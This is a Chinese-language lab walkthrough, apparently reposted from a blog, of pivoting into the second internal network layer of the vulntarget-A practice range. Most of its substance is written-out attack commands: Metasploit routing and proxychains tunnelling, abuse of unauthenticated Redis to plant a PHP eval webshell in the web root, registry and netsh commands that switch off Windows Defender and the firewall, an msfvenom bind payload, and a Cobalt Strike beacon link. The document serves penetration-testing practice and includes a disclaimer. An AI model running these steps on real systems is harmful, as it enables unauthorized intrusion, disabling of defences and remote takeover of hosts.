内网安全:内网渗透.(拿到内网主机最高权限 vulntarget 靶场 A)

这篇具有很好参考价值的文章主要介绍了内网安全:内网渗透.(拿到内网主机最高权限 vulntarget 靶场 A)。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

内网安全:内网渗透.(拿到内网主机最高权限)

内网穿透又被称为NAT穿透,内网端口映射外网,在处于使用了NAT设备的私有TCP/IP网络中的主机之间建立连接的问题。通过映射端口,让外网的电脑找到处于内网的电脑。端口映射,就是NAT地址转换的一种,功能就是把在公网的地址转翻译成私有地址。在局域网内部的任一PC或服务器上运行到内网穿透客户端,此时域名解析到的IP地址是局域网网关出口处的公网IP地址,再在网关处做端口映射指向监控设备即可.


目录:

内网安全:内网渗透.(拿到内网主机最高权限)

网络环境所示:

主机信息:

内网渗透 测试:

(1)内网主机探测:

(2)构建通道:

(3)内网扫描:

(4)内网渗透:

(5)上线 MSF  :

(6)上线 CS  :


免责声明:

严禁利用本文章中所提到的虚拟机和技术进行任何形式的攻击,否则后果自负,上传者不承担任何责任。


网络环境所示:

内网安全:内网渗透.(拿到内网主机最高权限 vulntarget 靶场 A)


主机信息:

主机

外网

内网1 内网2
kali 192.168.0.101
win 7 192.168.0.102 10.0.20.98
win 2016 10.0.20.99 10.0.10.111
win 2019 10.0.10.110

前面的 Web服务器 渗透:Web安全:拿到 Web 服务器 最高权限.(vulntarget 靶场 1)_半个西瓜.的博客-CSDN博客


内网渗透 测试:

(1)内网主机探测:

shell ipconfig            //查看 网卡的 网段信息.

内网安全:内网渗透.(拿到内网主机最高权限 vulntarget 靶场 A)

主机探测和端口探测.

内网安全:内网渗透.(拿到内网主机最高权限 vulntarget 靶场 A)

内网安全:内网渗透.(拿到内网主机最高权限 vulntarget 靶场 A)

内网安全:内网渗透.(拿到内网主机最高权限 vulntarget 靶场 A)

发现一台内网主机,IP为 10.0.20.99

内网安全:内网渗透.(拿到内网主机最高权限 vulntarget 靶场 A)


(2)构建通道:

代理转发.【msf 代理】

run post/multi/manage/autoroute            // 添加路由

run autoroute -p                           // 查看路由

内网安全:内网渗透.(拿到内网主机最高权限 vulntarget 靶场 A)


代理转发.【CS 代理】

内网安全:内网渗透.(拿到内网主机最高权限 vulntarget 靶场 A)

内网安全:内网渗透.(拿到内网主机最高权限 vulntarget 靶场 A)

查看代理信息.

内网安全:内网渗透.(拿到内网主机最高权限 vulntarget 靶场 A)

内网安全:内网渗透.(拿到内网主机最高权限 vulntarget 靶场 A)

修改配置 /etc/proxychains4.conf 文件

vim /etc/proxychains4.conf        //打开这个文件.

内网安全:内网渗透.(拿到内网主机最高权限 vulntarget 靶场 A)


(3)内网扫描:

浏览器配置代理:

内网安全:内网渗透.(拿到内网主机最高权限 vulntarget 靶场 A)

内网安全:内网渗透.(拿到内网主机最高权限 vulntarget 靶场 A)

进行访问 第二层内网主机的 6379 端口( Redis 服务 )

proxychains4 redis-cli -h 10.0.20.99

proxychains4 redis-cli -h 【第二层内网 主机 IP 地址】

内网安全:内网渗透.(拿到内网主机最高权限 vulntarget 靶场 A)


(4)内网渗透:

利用 Redis 未授权漏洞.
由于 10.0.20.99 这台机器开启了Web服务,我们要通过 Resis 未授权漏洞写入webshell,于是我们
需要知道网站的绝对路径,并且需要具有读写权限。

方法一:
我们也可以简单探测,有没有可能暴露敏感信息的文件
比如:/phpinfo.php 这些文件.(这个过程可以使用目录扫描等等方法.)
(Resis 未授权漏洞 默认路径: C:\phpStudy\PHPTutorial\www\)

方法二:
如果不是这个默认路径,则修改为路径: Redis写启动项(需要猜路径 猜用户名),定时自动执行bat脚本
上线或者反弹shell

内网安全:内网渗透.(拿到内网主机最高权限 vulntarget 靶场 A)

因此我们写入 wenshell (一句话木马)
(1)proxychains4 redis-cli -h 10.0.20.99        //连接 Redis 服务.

(2)config set dir "C:/phpStudy/PHPTutorial/www/"    
//在网站的根目录下写进去一个脚本.(C:/phpStudy/PHPTutorial/www/ 是 win 默认路径)

(3)config set dbfilename bgxg.php                //脚本名称为 bgxg.php

(4)set 1 "<?php @eval($_POST['bgxg']);?>"        // 脚本内容(一句话木马)

(5)save                                          // 保存 刚刚写入的信息.

内网安全:内网渗透.(拿到内网主机最高权限 vulntarget 靶场 A)

内网安全:内网渗透.(拿到内网主机最高权限 vulntarget 靶场 A)

内网安全:内网渗透.(拿到内网主机最高权限 vulntarget 靶场 A)

内网安全:内网渗透.(拿到内网主机最高权限 vulntarget 靶场 A)

上传木马程序,需要关闭 Windows Denfder 

REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

gpupdate /force

内网安全:内网渗透.(拿到内网主机最高权限 vulntarget 靶场 A)

上传木马程序,需要关闭防火墙.

(1)Netsh advfirewall show allprofiles        // 查看防火墙配置

(2)netSh advfirewall set allprofiles state off        // 关闭防火墙

内网安全:内网渗透.(拿到内网主机最高权限 vulntarget 靶场 A)

内网安全:内网渗透.(拿到内网主机最高权限 vulntarget 靶场 A)


(5)上线 MSF :

渗透 第二层 内网.[msf 代理]
run post/multi/manage/autoroute            // 添加路由

run autoroute -p                           // 查看路由

background                                 // 挂起 会话

内网安全:内网渗透.(拿到内网主机最高权限 vulntarget 靶场 A)

重新再生成一个新的程序(木马)【用来渗透第二层内网.】

msfvenom -p windows/meterpreter/bind_tcp LHOST=192.168.0.101 LPORT=12345 -f exe > 12345.exe

内网安全:内网渗透.(拿到内网主机最高权限 vulntarget 靶场 A)

set payload windows/meterpreter/bind_tcp       // 设置 payload 

set lport 12345                                // 设置 和程序(木马)的端口

set rhost 10.0.20.99                           // 设置 第二层内网的目标主机.

run                                            // 进行 测试.

内网安全:内网渗透.(拿到内网主机最高权限 vulntarget 靶场 A)

利用 蚁剑 进行上传 程序(木马)到第二层主机中 并执行.

内网安全:内网渗透.(拿到内网主机最高权限 vulntarget 靶场 A)

内网安全:内网渗透.(拿到内网主机最高权限 vulntarget 靶场 A)


(6)上线 CS  :

建立 Beacon TCP 监听器:

内网安全:内网渗透.(拿到内网主机最高权限 vulntarget 靶场 A)

内网安全:内网渗透.(拿到内网主机最高权限 vulntarget 靶场 A)

生成一个新程序木马.(要来渗透第二层内网的其他主机)

内网安全:内网渗透.(拿到内网主机最高权限 vulntarget 靶场 A)

内网安全:内网渗透.(拿到内网主机最高权限 vulntarget 靶场 A)

内网安全:内网渗透.(拿到内网主机最高权限 vulntarget 靶场 A)

利用 蚁剑 进行上传 程序(木马)

内网安全:内网渗透.(拿到内网主机最高权限 vulntarget 靶场 A)

内网安全:内网渗透.(拿到内网主机最高权限 vulntarget 靶场 A)

内网安全:内网渗透.(拿到内网主机最高权限 vulntarget 靶场 A)

connect 10.0.20.99 666

connect 第二层内网主机 IP 地址 木马的端口

内网安全:内网渗透.(拿到内网主机最高权限 vulntarget 靶场 A)

        

         

          文章来源地址https://www.toymoban.com/news/detail-476683.html

到了这里,关于内网安全:内网渗透.(拿到内网主机最高权限 vulntarget 靶场 A)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 内网安全:Cobalt Strike 工具 渗透多层内网主机.(正向 || 反向)

    Cobalt Strike 是一款以 metasploit 为基础的 GUI 的框架式渗透工具,又被业界人称为 CS。拥有多种协议主机上线方式,集成了端口转发,服务扫描,自动化溢出,多模式端口监听,winexe 木马生成,win dll 木马生成,java 木马生成,office 宏病毒生成,木马捆绑;钓鱼攻击包括:站点克

    2024年02月11日
    浏览(35)
  • 封神台 第四章:进击!拿到Web最高权限(绕过防护上传木马)

    一、1.通过修改Cookie登录后台(没用重打)         2,上传SHELL!3,Flag在网站根目录(flag.php)         3.上传图片时建议上传小文件,建议用QQ表情         尤里通过XSS终于得到了管理员Cookie,在修改了cookie后尤里直接绕过了登录密码,         看到了后台功

    2024年02月07日
    浏览(27)
  • 中间件安全:Apache Tomcat 弱口令.(反弹 shell 拿到服务器的最高控制权.)

    Tomcat  是 Apache 软件基金会(Apache Software Foundation)的 Jakarta 项目中的一个核心项目,由 Apache、Sun 和其他一些公司及个人共同开发而成。 通过弱口令登录后台,部署 war 包 geshell . 中间件安全:Apache Tomcat 弱口令. Apache Tomcat 弱口令: 靶场准备:Web安全:Vulfocus 靶场搭建.(漏

    2024年02月05日
    浏览(49)
  • 内网渗透神器CobaltStrike之权限提升(七)

    UAC-DLL UAC-DLL攻击模块允许攻击者从低权限的本地管理员账户获得更高的权限。这种攻击利用UAC的漏洞,将ArtifactKit生成的恶意DLL复制到需要特权的位置。 适用于Windows7和Windows8及更高版本的未修补版本 Uac-token-duplication 此攻击模块也是为了从低权限的本地管理员账户获得更高的

    2024年02月12日
    浏览(25)
  • 渗透靶场——vulntarget-a(完整版)

    上一篇在代理那块出了点问题,所以今天又重新写了一下这个靶场的完整过程 此次靶场不再是单个镜像,而是三个镜像文件,接下来先给大家说一下整个环境的拓扑图以环境布置。 只需要把win7外网机和kali机同样的网卡host-Only形式即可,剩下的两台即可也是直接安排好了,无

    2024年02月07日
    浏览(22)
  • 内网渗透之权限维持-自启动&映像劫持&粘滞键&辅助屏保后门&WinLogon

    以下几种方法都需服务器重启 1、自启动路径加载 C:UsersAdministratorAppDataRoamingMicrosoftWindowsStart MenuProgramsStartup 将木马放到此目录,等待服务器重启即可 2、自启动服务加载 3、自启动注册表加载 -当前用户键值 HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun -服务器键值(

    2024年02月06日
    浏览(37)
  • 打穿内网之Vulntarget-a靶场实战记录

    通达OA未授权上传+文件包含RCE Redis未授权写马 ms17-010永恒之蓝 代理转发内网跳板 CVE-2020-1472 域控杀器Zerologon wmiexec/smbexec横向移动 cobalt strike与msf的shell传递 靶场地址:https://github.com/crow821/vulntarget 攻击机 kali ip:192.168.1.11 web服务器(WIN7) 内网ip:10.0.20.98 外网ip:192.168.1.7 w

    2024年02月06日
    浏览(22)
  • 《WEB安全渗透测试》(37) 内网渗透神器:fscan使用攻略

    Fscan是一款内网综合扫描工具,它非常的方便,一键启动,之后完全自动化、并且全方位漏洞扫描。它支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。 这

    2024年02月13日
    浏览(30)
  • 内网安全-信息收集-内网资源探测-扫描内网存活主机

    简介 基于ICMP发现存活主机 for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.199.%I| findstr \\\"TTL=\\\" 或者也可以使用nmap: nmap -sP 192.168.204.1/24 基于NetBlOS(网络基本输入/输出系统)协议发现存活主机 nbtscan-1.0.35.exe 192.168.199.1/24 基于UDP发现存活主机 us -mU 192.168.204.1/24 TCP是有连接的协议,而UDP是

    2024年02月03日
    浏览(36)
  • 网络安全(黑客)内网渗透基础知识

    0x01 内网概述 内网也指局域网(Local Area Network,LAN)是指在某一区域内由多台计算机互联成的计算机组。一般是方圆几千米以内。局域网可以实现文件管理、应用软件共享、打印机共享、工作组内的历程安排、电子邮件和传真通信服务等功能。 内网是封闭型的,它可以由办公

    2024年02月13日
    浏览(42)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包